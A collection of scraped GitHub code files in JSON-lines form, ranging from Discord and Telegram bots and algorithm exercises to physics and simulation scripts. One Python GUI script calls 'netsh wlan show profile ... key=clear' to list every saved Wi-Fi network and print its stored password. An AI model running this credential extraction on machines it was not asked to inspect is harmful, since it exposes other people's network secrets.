self.db.get_connection()\n await conn.execute(\"UPDATE guild_config SET guild_name = $1 WHERE guild_id=$2\", guild.name, guild.id)\n await conn.close()\n \n async def update_guild_members(self, guild: discord.Guild):\n conn = await self.db.get_connection()\n await conn.execute(\"UPDATE guild_config SET guild_members = $1 WHERE guild_id=$2\", len(guild.members), guild.id)\n await conn.close()\n \n async def update_guild_text(self, guild: discord.Guild):\n conn = await self.db.get_connection()\n await conn.execute(\"UPDATE guild_config SET guild_text = $1 WHERE guild_id=$2\", len(guild.text_channels), guild.id)\n await conn.close()\n \n async def update_guild_voice(self, guild: discord.Guild):\n conn = await self.db.get_connection()\n await conn.execute(\"UPDATE guild_config SET guild_voice = $1 WHERE guild_id=$2\", len(guild.voice_channels), guild.id)\n await conn.close()\n \n async def update_guild_roles(self, guild: discord.Guild):\n conn = await self.db.get_connection()\n await conn.execute(\"UPDATE guild_config SET guild_roles = $1 WHERE guild_id=$2\", len(guild.roles), guild.id)\n await conn.close()","repo_name":"Lemony-Juicy/exult-bot","sub_path":"bot/database/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29874056372","text":"from collections import deque\n\n\ndef check(p, now):\n dr = [1, -1, 0, 0]\n dc = [0, 0, -1, 1]\n visited = [[0] * 5 for _ in range(5)]\n visited[now[0]][now[1]] = 1\n\n q = deque([now])\n while q:\n r, c, l = q.popleft()\n # 거리두기 규칙을 넘어가면 확인 X\n if l == 2:\n continue\n\n for i in range(4):\n nr, nc = r + dr[i], c + dc[i]\n if nr < 0 or nr >= 5 or nc < 0 or nc >= 5:\n continue\n # 방문 지점 또는 벽을 만나면 진행 X\n if visited[nr][nc] or p[nr][nc] == 'X':\n continue\n # 사람을 만나는 경우 True 반환\n if p[nr][nc] == 'P':\n return True\n\n visited[nr][nc] = 1\n q.append((nr, nc, l + 1))\n\n return False\n\n\ndef solution(places):\n answer = []\n for place in places:\n stop = False\n for r in range(5):\n if stop:\n break\n for c in range(5):\n if place[r][c] == 'P':\n # 거리두기를 지키지 않은 사람이 존재하는 경우 0 추가 및 반복 종료\n if check(place, (r, c, 0)):\n answer.append(0)\n stop = True\n break\n # 반복이 종료된 경우가 아니면 1 추가\n if not stop:\n answer.append(1)\n return answer\n\n\nprint(solution([]))\n","repo_name":"essk13/Algorithm","sub_path":"01_problem/python/2022/Programmers/Programmers_81302/81302_Programmers.py","file_name":"81302_Programmers.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28731607823","text":"# 循环\nprint('循环')\nfor i in '100':\n print(i)\n# 循环0到100\nprint('循环0到100')\nfor i in range(1, 100):\n if i % 2 == 0:\n break\n print(i)\nprint('while循环')\nsum = 0\nnum = 0\nwhile num < 100:\n sum += num\n num += 1\n print(sum)\n","repo_name":"youxuehu/python-base","sub_path":"py01/hello/循环.py","file_name":"循环.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"7118245992","text":"import numpy as np\n\nrho_crit = 8.62*10**-27\nmass_H = 1.672*10**-27\nc = 3*10**8\nH0 = float(68)/float(3.086e19)\nOMm = 0.31\nOMl = 0.75\nbaryon2DMfrac = 0.1\nHy2baryonfrac = 0.75\nHyIGMfrac = 1\nlya_min = 2.5e42\nf12 = 0.4162\ne = 1.602e-19\nme = 9.11e-31\nkb = 1.38064852e-23 #m^2 kg s^-2 K ^-1\nmp = 1.672e-27 #kg\nc = 3.0e8 #m/s\nf_alpha_0 = 2.466e15 #1/s\n\n\n\n \ndef oops_we_are_at_the_edge(y,z, HII_DIM):\n if y == HII_DIM and z == HII_DIM:\n return int(HII_DIM - 1), int(HII_DIM - 1)\n else:\n if y == HII_DIM:\n return int(HII_DIM - 1) , z\n if z == HII_DIM:\n return y, int(HII_DIM - 1)\n\ndef map2box(list_to_map, HII_DIM):\n #HII_DIM is the target resolution of the output map\n Halo_Position_Box = np.zeros((HII_DIM, HII_DIM, HII_DIM))\n Halo_Mass_Box = np.zeros((HII_DIM, HII_DIM, HII_DIM))\n for i in range(list_to_map.shape[0]):\n x, y, z = np.round(HII_DIM*list_to_map[i][1],0), np.round(HII_DIM*list_to_map[i][2],0), np.round(HII_DIM*list_to_map[i][3],0)\n if y == HII_DIM or z == HII_DIM:\n y, z = oops_we_are_at_the_edge(int(y),int(z), HII_DIM )\n if x == HII_DIM or z == HII_DIM:\n x, z = oops_we_are_at_the_edge(int(x),int(z), HII_DIM)\n Halo_Position_Box[int(x)][int(y)][int(z)] += 1\n Halo_Mass_Box[int(x)][int(y)][int(z)] += list_to_map[i][0]\n return Halo_Position_Box , Halo_Mass_Box\n\n\ndef sort_into_slices(list_to_sort, HII_DIM, slice):\n filtered_list = []\n for i in range(list_to_sort.shape[0]):\n if np.round(HII_DIM*list_to_sort[i][1],0) == slice:\n filtered_list.append(list_to_sort[i])\n return np.array(filtered_list)\n\n\ndef remove_los_from_list(list_of_halos):\n filtered_list = []\n for i in range(list_of_halos.shape[0]):\n filtered_list.append((list_of_halos[i][2], self.HII_DIM*list_of_halos[i][3]))\n return np.array(filtered_list)\n","repo_name":"pagano-michael/FRB","sub_path":"misc_functions.py","file_name":"misc_functions.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31346174845","text":"import PySimpleGUI as sg\r\nimport subprocess\r\n\r\ndef redes_info():\r\n try:\r\n comando_netsh = subprocess.check_output(\"netsh wlan show profiles\", encoding=\"cp858\", shell=True)\r\n redes = []\r\n for linha in comando_netsh.split('\\\\n'):\r\n if \"Todos os Perfis de Usuários\" in linha:\r\n posicao_referencia = linha.find(\":\")\r\n rede = linha[posicao_referencia + 2:]\r\n senha = informacao_da_rede(rede)\r\n redes.append(rede + \" - \" + senha)\r\n return redes\r\n except subprocess.CalledProcessError as E:\r\n return [\"Erro ao obter informações\"]\r\n\r\ndef informacao_da_rede(wifi):\r\n try:\r\n comando_netsh = subprocess.check_output([\"netsh\", \"wlan\", \"show\", \"profile\", wifi, \"key\", \"=\", \"clear\"],\r\n encoding=\"cp858\", shell=True)\r\n senha = ''\r\n for linha in comando_netsh.split('\\n'):\r\n if \"Conteúdo da Chave\" in linha:\r\n posicao_referencia = linha.find(\":\")\r\n senha = linha[posicao_referencia + 2:]\r\n break\r\n return senha\r\n except subprocess.CalledProcessError as E:\r\n return \"Confira o nome da rede\"\r\nsg.theme(\"Black\")\r\nlayout = [\r\n [sg.Text(\"Bem vindo! Qual senha você gostaria de saber?\")],\r\n [sg.Input(key='-INPUT-', default_text='Nome da rede')],\r\n [sg.Text(size=(40,1), key='-OUTPUT-')],\r\n [sg.Button('Pesquisar'), sg.Button('Sair')],\r\n [sg.Button('Ver todas as redes')],\r\n [sg.Text('By Leo')]\r\n]\r\n\r\nwindow = sg.Window('Senha do Wifi', layout)\r\n\r\nwhile True:\r\n event, values = window.read()\r\n if event == sg.WINDOW_CLOSED or event == 'Sair':\r\n break\r\n elif event == 'Ver todas as redes':\r\n resultado = redes_info()\r\n if resultado:\r\n sg.popup_scrolled('\\n'.join(resultado), title='Todas as redes')\r\n else:\r\n sg.popup('Nenhuma rede Wi-Fi encontrada.', title='Todas as redes')\r\n elif event == 'Pesquisar':\r\n rede = values['-INPUT-']\r\n senha = informacao_da_rede(rede)\r\n window['-OUTPUT-'].update(f\"Para a rede '{rede}' a senha é: {senha}\")\r\n\r\nwindow.close()\r\n","repo_name":"MaybeLexter/ver_senhas_pelo_comando_subprocess","sub_path":"projeto01_versenhaswifisalvas.py","file_name":"projeto01_versenhaswifisalvas.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"37299473024","text":"from collections import defaultdict\n\nclass Solution:\n def getParent(self, parent, x):\n if parent[x] == x:\n return x\n parent[x] = self.getParent(parent, parent[x])\n return parent[x]\n \n def connect(self, parent, a, b):\n parent[self.getParent(parent, a)] = self.getParent(parent, b)\n \n def isConnected(self, parent, a, b):\n return self.getParent(parent, a) == self.getParent(parent, b)\n \n def findAllPeople(self, n: int, meetings: List[List[int]], firstPerson: int) -> List[int]:\n parent = list(range(n))\n meets = defaultdict(list)\n for a, b, t in meetings:\n meets[t].append((a, b))\n self.connect(parent, 0, firstPerson)\n people = set()\n for t in sorted(meets.keys()):\n people.clear()\n for a, b in meets[t]:\n self.connect(parent, a, b)\n people.update({a, b})\n for p in people:\n if not self.isConnected(parent, p, 0):\n parent[p] = p\n return [i for i in range(n) if self.isConnected(parent, i, 0)]","repo_name":"theabbie/leetcode","sub_path":"find-all-people-with-secret.py","file_name":"find-all-people-with-secret.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"15922260912","text":"print(\"Welcome to the Love Calculator!\")\nname1 = input(\"What is your name? \\n\")\nname2 = input(\"What is their name? \\n\")\n# 🚨 Don't change the code above 👆\n\n#Write your code below this line 👇\ntotal=name1+name2\ntotal.lower()\nt=total.count('t')\nr=total.count('r')\nu=total.count('u')\ne=total.count('e')\n\nsm=t+r+u+e\n\nl=total.count('l')\no=total.count('o')\nv=total.count('v')\ne=total.count('e')\n\nad=l+o+v+e\n\nto=str(sm)+str(ad)\ntot=int(to)\n\nif tot<10 or tot>90:\n print(f'Your score is {to}, you go together like coke and mentos.')\nif tot>=40 and tot<=50:\n print(f'Your score is {to}, you are alright together.')\nelse:\n print(f'Your score is {to}.')\n","repo_name":"mikeoladapo/Love-caculator","sub_path":"lovecalculator.py","file_name":"lovecalculator.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17576753652","text":"from pyepidoc.epidoc.epidoc import EpiDoc\nfrom pyepidoc.utils import head\nfrom pyepidoc.epidoc.funcs import lang, line\n\nimport pytest\n\nrelative_filepaths = {\n 'ISic000001': 'api/files/single_files_untokenized/ISic000001.xml',\n 'persName_nested': 'api/files/persName_nested.xml',\n 'langs_1': 'api/files/langs_1.xml',\n 'langs_2': 'api/files/langs_2.xml',\n 'langs_3': 'api/files/langs_3.xml',\n 'line_1': 'api/files/line_1.xml',\n 'line_2': 'api/files/line_2.xml',\n 'gap': 'api/files/gap.xml',\n 'comma': 'api/files/comma.xml'\n}\n\n\ndef test_collect_tokens():\n filepath = relative_filepaths['ISic000001']\n doc = EpiDoc(filepath, fullpath=False)\n\n assert doc.tokens_list_str == [\n 'dis', \n 'manibus', \n 'Zethi', \n 'vixit', \n 'annis', \n 'VI'\n ]\n\n\ndef test_expans():\n filepath = relative_filepaths['ISic000001']\n \n doc = EpiDoc(filepath, fullpath=False)\n edition = head(doc.editions())\n\n assert edition != None\n assert len(edition.expan_elems) == 3\n\n\ndef test_langs():\n \"\"\"\n Tests that the collecting of language information happens in the correct way.\n \"\"\"\n\n doc_1 = EpiDoc(relative_filepaths['langs_1'], fullpath=False)\n\n assert doc_1.langs == ['la', 'grc']\n assert lang(head(doc_1.expans)) == 'la'\n assert lang(head(doc_1.tokens)) == 'grc'\n\n doc_2 = EpiDoc(relative_filepaths['langs_2'], fullpath=False)\n assert lang(head(doc_2.expans)) == 'la'\n assert lang(head(doc_2.tokens)) == 'grc'\n\n doc_3 = EpiDoc(relative_filepaths['langs_3'], fullpath=False)\n assert lang(head(doc_3.expans)) == 'la'\n assert lang(head(doc_3.tokens)) == 'grc'\n\n\ndef test_lines():\n doc_1 = EpiDoc(relative_filepaths['line_1'], fullpath=False)\n\n token = head(doc_1.tokens)\n assert line(token).n == '1'\n\n supplied = head(token.supplied)\n assert line(supplied).n == '1'\n\n doc_2 = EpiDoc(relative_filepaths['line_2'], fullpath=False)\n token = head(doc_2.tokens)\n\n assert line(token).n == '1'\n \n second_token = doc_2.tokens[1]\n assert second_token.text_desc == 'ambulavit'\n assert line(second_token).n == '2'\n\n\ndef test_gaps():\n doc = EpiDoc(relative_filepaths['gap'], fullpath=False)\n has_gaps = doc.has_gap(reasons=['lost'])\n assert has_gaps == True\n\n\ndef test_nested():\n doc = EpiDoc(relative_filepaths['persName_nested'], fullpath=False)\n assert doc.tokens_list_str == ['Maximus', 'Decimus', 'meridius']\n assert [str(token) for token in doc.w_tokens] == ['meridius']\n\n\ndef test_punct():\n \"\"\"\n Tests that comma is removed from string version of token\n \"\"\"\n doc = EpiDoc(relative_filepaths['comma'], fullpath=False) \n assert str(doc.tokens[0]) == \"hello\"\n\n\n@pytest.mark.parametrize(\"filepath\", relative_filepaths.values())\ndef test_load_relative_filepath_from_str(filepath:str):\n doc = EpiDoc(filepath, fullpath=False)\n assert doc.tokens_list_str != []","repo_name":"rsdc2/PyEpiDoc","sub_path":"tests/api/expected/test_epidoc_intended.py","file_name":"test_epidoc_intended.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41905635421","text":"import logging\r\nfrom aiogram import Bot, Dispatcher, executor, types\r\nfrom confiqSQL import TOKEN\r\n\r\nbot = Bot(token=TOKEN)\r\ndp = Dispatcher(bot)\r\n\r\n@dp.message_handler(commands=['start'])\r\nasync def process_hallo(message: types.Message):\r\n await bot.send_message(message.from_user.id, 'Здравствуйте.\\nПожалуйста, введите имя пользователя.')\r\n\r\n@dp.message_handler(commands=['commands'])\r\nasync def process_hallo(message: types.Message):\r\n await bot.send_message(message.from_user.id, 'Вот список моих команд:\\n/start - вернуться к началу\\n/commands - показать все команды\\n/stop - закончить разговор')\r\n\r\n@dp.message_handler(commands=['stop'])\r\nasync def process_hallo(message: types.Message):\r\n await bot.send_message(message.from_user.id, 'Пока!\\nРад был пообщаться =)')\r\n\r\n@dp.message_handler()\r\nasync def echo(message: types.Message):\r\n # old style:\r\n # await bot.send_message(message.chat.id, message.text)\r\n\r\n await message.answer(message.text)\r\n\r\nif __name__ == '__main__':\r\n executor. start_polling(dp, skip_updates=True)\r\n","repo_name":"sigucci/Python","sub_path":"botSQL.py","file_name":"botSQL.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71730799720","text":"import numpy as np\nimport os\nimport time\nimport matplotlib.pyplot as plt\n\n\ndef collect_data(collectedData, tt, collisions, satParameters, smallFragments, largeFragments, smallFragmentCols,\n largeFragmentCols, counter):\n '''\n Collects various different quantities of the simulation of the kessler syndrome.\n\n Args:\n collectedData (2darray): Measured data.\n tt (int): Iteration step.\n collisions (int): Number of collisions.\n satParameters (2darray): Orbital parameters, period time and active status for each satellite.\n numberOfFragments (int): Total number of fragments.\n counter (int): Counter variable for indices assignment.\n\n Returns:\n collectedData (2darray): Updated measured data.\n '''\n activeSatParameters = satParameters[:, -1] == 1\n inactiveSatParameters = satParameters[:, -1] == 0\n activeSatellites = np.count_nonzero(activeSatParameters)\n inactiveSatellites = np.count_nonzero(inactiveSatParameters)\n totalSatellites = activeSatellites + inactiveSatellites\n\n collectedData[0][counter] = tt\n collectedData[1][counter] = collisions\n collectedData[2][counter] = np.sum(collectedData[1])\n collectedData[3][counter] = totalSatellites\n collectedData[4][counter] = activeSatellites\n collectedData[5][counter] = inactiveSatellites\n collectedData[6][counter] = smallFragments\n collectedData[7][counter] = largeFragments\n collectedData[8][counter] = smallFragmentCols\n collectedData[9][counter] = largeFragmentCols\n\n return collectedData\n\n\ndef plot_data(simulationData):\n '''\n Plots the gathered simulation data.\n Args:\n simulationData (2darray): Measured data.\n\n Returns:\n None.\n '''\n tt = simulationData[0]\n collisionsPerIteration = simulationData[1]\n totalCollisions = simulationData[2]\n totalSatellites = simulationData[3]\n activeSatellites = simulationData[4]\n inactiveSatellites = simulationData[5]\n numberOfFragments = simulationData[6]\n\n fig, axs = plt.subplots(2, 2, figsize=(12, 8))\n\n axs[0, 0].plot(tt, collisionsPerIteration)\n axs[0, 0].set_xlabel('Time')\n axs[0, 0].set_ylabel('Collisions per Iteration')\n axs[0, 0].set_title('Collisions per Iteration')\n\n axs[0, 1].plot(tt, totalCollisions)\n axs[0, 1].set_xlabel('Time')\n axs[0, 1].set_ylabel('Total collisions')\n axs[0, 1].set_title('Collisions over time')\n\n axs[1, 0].plot(tt, activeSatellites, label='active')\n axs[1, 0].plot(tt, inactiveSatellites, label='inactive')\n axs[1, 0].plot(tt, totalSatellites, label='total')\n axs[1, 0].set_xlabel('Time')\n axs[1, 0].set_ylabel('Number of satellites')\n axs[1, 0].set_title('Active and inactive satellites over time')\n axs[1, 0].legend()\n\n axs[1, 1].plot(tt, numberOfFragments)\n axs[1, 1].set_xlabel('Time')\n axs[1, 1].set_ylabel('Number of fragments')\n axs[1, 1].set_title('Fragments over time')\n\n plt.tight_layout()\n currentDir = os.getcwd()\n currentTime = time.strftime(\"%a %b %d %H:%M:%S %Y\") # Get the current time in the desired format\n currentTime = currentTime.replace(\" \", \"_\") # Replace spaces with underscores\n currentTime = currentTime[4:]\n currentTime = currentTime.replace(\":\", \"-\") # Replace colons with hyphens or any other desired character\n saveDir = os.path.join(currentDir, os.path.abspath(\"output/\" + currentTime + \".png\"))\n plt.savefig(saveDir, dpi=600)\n","repo_name":"janlucahu/HubaldModel","sub_path":"Python/OrbitalDistance/data_handling.py","file_name":"data_handling.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17865705383","text":"ACCESS_KEY = '@@{cred_aws.username}@@'\nSECRET_KEY = '@@{cred_aws.secret}@@'\nAWS_REGION = '@@{clusters_geolocation}@@'\nINSTANCE_ID = '@@{ec2_instance_id}@@'\n\nimport boto3\n\nboto3.setup_default_session(\n aws_access_key_id=ACCESS_KEY,\n aws_secret_access_key=SECRET_KEY,\n region_name=AWS_REGION\n)\n\nclient = boto3.client('ec2')\n\ntry:\n # Allocate elatic PublicIp\n allocation = client.allocate_address(Domain='vpc')\n print(\"Allocation Id: \"+ allocation['AllocationId'] + \" Public IP: \" + allocation['PublicIp'])\n\n # Associate Elastic IP with an ec2 instance\n response = client.associate_address(AllocationId=allocation['AllocationId'],\n InstanceId=INSTANCE_ID)\n print(response)\nexcept ClientError as e:\n print(e)\n","repo_name":"nutanix/blueprints","sub_path":"task-library/aws/ec2_associate_elastic_ip.py","file_name":"ec2_associate_elastic_ip.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"18"} +{"seq_id":"38979410377","text":"from Modules import Logger, Guilds\n\nimport random\nimport discord\nfrom discord.ext import commands, tasks\n\nLog = Logger.Get(\"VanityCog\")\n\n\nclass Cog(commands.Cog):\n \"\"\"A cog for handling vanity functions such as Status changes\"\"\"\n\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n Log.info(\"Initialised\")\n\n @commands.Cog.listener()\n async def on_guild_join(self, guild: discord.Guild):\n \"Announcement that a guild has invited the bot\"\n owner = self.bot.fetch_user(self.bot.owner_id)\n owner.send(f\"Yay, {guild.name} is the {len(self.bot.guilds)}th server.\")\n \n # @tasks.loop(seconds=5)\n # async def ChangeStatus(self):\n # Selection = random.randint(0, len(Statuses) - 1)\n # Activity, Message = Statuses[Selection]\n # # await self.bot.change_presence(activity=Activity(name=Message))\n # Log.debug(f\"Changed presence to status {Selection}\")","repo_name":"Ben-Brady/PureImage","sub_path":"src/Cogs/VanityCog.py","file_name":"VanityCog.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"71290257960","text":"import sys\n\n\ndef input(): return sys.stdin.readline().strip()\n\n\ndef sub_board(board, start_y, end_y, start_x, end_x):\n ret = []\n for y in range(start_y, end_y):\n ret.append([])\n for x in range(start_x, end_x):\n ret[-1].append(board[y][x])\n return ret\n\n\ndef quad(board):\n local_n = len(board)\n\n summation = 0\n for y in range(local_n):\n for x in range(local_n):\n summation = summation + board[y][x]\n\n if summation == 0:\n print(0, end=\"\")\n elif summation == local_n * local_n:\n print(1, end=\"\")\n else:\n mid = local_n // 2\n print(\"(\", end=\"\")\n quad(sub_board(board, 0, mid, 0, mid))\n quad(sub_board(board, 0, mid, mid, local_n))\n quad(sub_board(board, mid, local_n, 0, mid))\n quad(sub_board(board, mid, local_n, mid, local_n))\n print(\")\", end=\"\")\n\n\nn = int(input())\nboard = [[int(x) for x in input()] for _ in range(n)]\n\nquad(board)\nprint()\n","repo_name":"greedy0110/algorithm","sub_path":"baekjoon/1992.py","file_name":"1992.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34196211015","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom dataclasses import dataclass, field\nfrom typing import List\n\n\n@dataclass\nclass ThrillistEvent:\n title: str\n link: str\n date: List[str] = field(metadata={\"transform\": \"parse_data\"})\n description: str\n price: str\n\n def __post_init__(self):\n if self.date.find(\"-\"):\n self.date = self.date.split(\"-\")\n else:\n self.date = [self.date]\n\n\nLA_URL = \"https://www.thrillist.com/events/los-angeles/things-to-do-in-los-angeles-this-weekend\"\n\n# BASE_URL = \"https://www.thrillist.com\"\n# LOST_ANGELES_URL = \"https://www.thrillist.com/los-angeles\"\n\n# page = requests.get(LOST_ANGELES_URL)\n\n# soup = BeautifulSoup(page.content, \"html.parser\")\n\n# events_headline = soup.find(\"h2\", {\"data-testid\": \"ucc-headline\"})\n\n# print(events_headline.find_parent()[\"href\"])\n\n# LA_events_url = BASE_URL + events_headline.find_parent()[\"href\"]\n\n# print(LA_events_url)\n\n\npage = requests.get(LA_URL)\n\nsoup = BeautifulSoup(page.content, \"html.parser\")\n\ntitle_tags = soup.find_all(\"h2\") # Every event title is wrapped in an h2\n\nevents = []\n\nfor tag in title_tags:\n title = tag.find(\"strong\")\n link = None if not tag.find(\"a\") else tag.find(\"a\").get(\"href\")\n\n print(f\"The link is: {link}\")\n if title:\n event_wrapper_div = title.find_parent(\"div\")\n description = event_wrapper_div.find_next_sibling(\"p\")\n\n date = description.find(\"strong\").text\n location = description.find(\"em\")\n price = description.find_all(string=True)[-1]\n\n # print(price)\n\n event = ThrillistEvent(title, link, date, location, price)\n\n print(event.date)\n\n # print(f\"\\n{description.find(text=True, recursive=False)}\\n\")\n # print(description)\n\n # print(date)\n # print(tag.find(\"strong\"))\n\n# URL = \"https://realpython.github.io/fake-jobs/\"\n# page = requests.get(URL)\n\n# print(page.text)\n\n# soup = BeautifulSoup(page.content, \"html.parser\")\n\n# results = soup.find(id=\"ResultsContainer\")\n\n# # print(results.prettify())\n\n# job_elements = results.find_all(\"div\", class_=\"card-content\")\n\n# for job_element in job_elements:\n# print(job_element, end=\"\\n\" * 2)\n","repo_name":"dkfann/events-scraper","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18838949981","text":"import FWCore.ParameterSet.Config as cms\n\nfrom FWCore.ParameterSet.VarParsing import VarParsing\n\n###############################\n####### Parameters ############\n###############################\n\noptions = VarParsing ('python')\n\n#options.register('NAME', False,\n#\t\t VarParsing.multiplicity.singleton,\n#\t\t VarParsing.varType.bool,\n#\t\t\t \"Run this on real data\"\n#\t\t\t )\noptions.register('PROC', \n\t\t'RPVSt350tojj_pythia8_13TeV_PU20bx25',\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.string,\n\t\t\"name\"\n\t\t)\n\noptions.register('local', \n\t\tTrue,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.bool,\n\t\t\"Run locally or crab\"\n\t\t)\noptions.register('debug', \n\t\tFalse,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.bool,\n\t\t\"Run just pruned\"\n\t\t)\noptions.register('HT', \n\t\t800.0,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"HT cut\"\n\t\t)\noptions.register('MassRes', \n\t\t0.30,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"MassRes cut\"\n\t\t)\noptions.register('Delta', \n\t\t300.0,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"Delta cut\"\n\t\t)\noptions.register('EtaBand', \n\t\t1.0,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"EtaBand cut\"\n\t\t)\noptions.register('JetPt', \n\t\t0.0,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"JetPt cut\"\n\t\t)\n\noptions.register('boostedJetPt', \n\t\t150.0,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"JetPt cut\"\n\t\t)\n\noptions.register('boostedHT', \n\t\t800.0,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"JetPt cut\"\n\t\t)\n\noptions.register('Asym', \n\t\t0.1,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"Asymmetry cut\"\n\t\t)\noptions.register('CosTheta', \n\t\t0.3,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"CosThetaStar cut\"\n\t\t)\noptions.register('SubPt', \n\t\t0.3,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"Subjet Pt Ratio cut\"\n\t\t)\noptions.register('Tau31', \n\t\t0.3,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"Tau31 cut\"\n\t\t)\noptions.register('Tau21', \n\t\t0.4,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"Tau21 cut\"\n\t\t)\noptions.register('DEta', \n\t\t1.0,\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"DEta cut\"\n\t\t)\noptions.register('btag', \n\t\t#0.244, ## CSVL\n\t\t0.679, ## CSVM\n\t\tVarParsing.multiplicity.singleton,\n\t\tVarParsing.varType.float,\n\t\t\"Btag cut\"\n\t\t)\n\n\n\noptions.parseArguments()\n\nprocess = cms.Process(\"Demo\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nNAME = options.PROC\n\nif options.local:\n\tprocess.load(NAME+'_RUNA_cfi')\n\t#process.load('RPVSt100tojj_13TeV_pythia8_RUNtuples_cfi')\nelse:\n\tprocess.source = cms.Source(\"PoolSource\",\n\t fileNames = cms.untracked.vstring(\n\t\t '/store/user/decosa/ttDM/CMSSW_7_4_X/QCD_HT1000to1500_TuneCUETP8M1_13TeV-madgraphMLM-pythia8/QCD_HT1000to1500/150927_053249/0000/B2GEDMNtuple_101.root',\n\t\t '/store/user/algomez/QCD_Pt_1400to1800_TuneCUETP8M1_13TeV_pythia8/RunIISpring15DR74_RUNA_Asympt25ns_v06p1/151001_090133/0000/RUNtuples_100.root',\n\t\t '/store/user/algomez/JetHT/Run2015B-PromptReco-v1_RUNA_v06/150930_081418/0000/RUNtuples_1.root',\n\t\t '/store/user/algomez/JetHT/Run2015B-PromptReco-v1_RUNA_v06/150930_081418/0000/RUNtuples_10.root',\n\t\t '/store/user/algomez/JetHT/Run2015B-PromptReco-v1_RUNA_v06/150930_081418/0000/RUNtuples_100.root',\n\t\t '/store/user/algomez/JetHT/Run2015B-PromptReco-v1_RUNA_v06/150930_081418/0000/RUNtuples_101.root',\n\t\t '/store/user/algomez/JetHT/Run2015B-PromptReco-v1_RUNA_v06/150930_081418/0000/RUNtuples_103.root',\n\t\t '/store/user/algomez/JetHT/Run2015B-PromptReco-v1_RUNA_v06/150930_081418/0000/RUNtuples_104.root',\n\t\t '/store/user/algomez/JetHT/Run2015B-PromptReco-v1_RUNA_v06/150930_081418/0000/RUNtuples_105.root',\n\t\t '/store/user/algomez/JetHT/Run2015B-PromptReco-v1_RUNA_v06/150930_081418/0000/RUNtuples_106.root',\n\t\t '/store/user/algomez/JetHT/Run2015B-PromptReco-v1_RUNA_v06/150930_081418/0000/RUNtuples_107.root',\n\t\t '/store/user/algomez/JetHT/Run2015B-PromptReco-v1_RUNA_v06/150930_081418/0000/RUNtuples_108.root',\n\t\t#'file:RUNtuple_1.root'\n\t )\n\t)\n\n#process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32 (options.maxEvents) )\n\nif 'bj' in NAME: bjsample = True\nelse: bjsample = False\n\nif 'JetHT' in NAME:\n\tHTtrigger = 'HLT_PFHT800'\nelse: \n\tHTtrigger = 'HLT_PFHT900'\n\nprocess.TFileService=cms.Service(\"TFileService\",fileName=cms.string( 'RUNFullAnalysis_'+NAME+'.root' ) )\n\nprocess.ResolvedAnalysisPlots = cms.EDAnalyzer('RUNAnalysis',\n\t\tcutHT\t \t\t= cms.double( options.HT ),\n\t\tcutMassRes \t\t= cms.double( options.MassRes ),\n\t\tcutDelta \t\t= cms.double( options.Delta ),\n\t\tcutEtaBand \t\t= cms.double( options.EtaBand ),\n\t\tcutJetPt \t\t= cms.double( options.JetPt ),\n\t\tbjSample\t\t= cms.bool( 